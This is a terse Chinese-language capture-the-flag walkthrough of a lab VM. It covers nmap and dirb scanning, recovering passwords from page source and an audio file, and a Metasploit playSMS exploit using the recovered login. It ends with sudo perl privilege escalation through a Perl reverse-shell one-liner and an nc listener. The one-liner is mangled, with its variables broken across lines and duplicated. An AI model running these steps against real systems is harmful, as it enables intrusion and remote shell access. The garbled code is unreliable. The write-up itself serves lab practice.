&&信息收集&&
ip查询
nmap 192.168.99.0/24
查看详细信息和查看是否有隐藏ip(没有隐藏的)
目录扫描
dirb http://192.168.99.34
robots.txt
/nothing
查看源代码
/tmp 、/uploads 、/angel 、/angel1(什么都没有)
/secure/
把源码下载到本地(发现要输入密码)
根据之前页面源码,密码是freedom
解压有一段音频
打不开
notepdd++打开
得到了用户名和路径
访问路径一下,得到一个登陆框
密码估计还在那个源代码哪里,最终试出密码为diana(登陆成功)
通过访问该页面使用playsms(基于web的短信平台)系统,暂时不知道他的版本。通过msf查看
配置
set targeturi SecreTSMSgatwayLogin
set rhost 192.168.99.34
set lhost 192.168.99.6
set lport 8888
set username touhid
set password diana
&& 提权&&
sudo -l(发现可以使用perl提权)
sudo perl -e ‘use Socket;
i
=
"
192.168.99.6
"
;
i="192.168.99.6";
i="192.168.99.6";p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in(
p
,
i
n
e
t
a
t
o
n
(
p,inet_aton(
p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
攻击机nc -lvvp 6666监听(shell反弹)
找到flag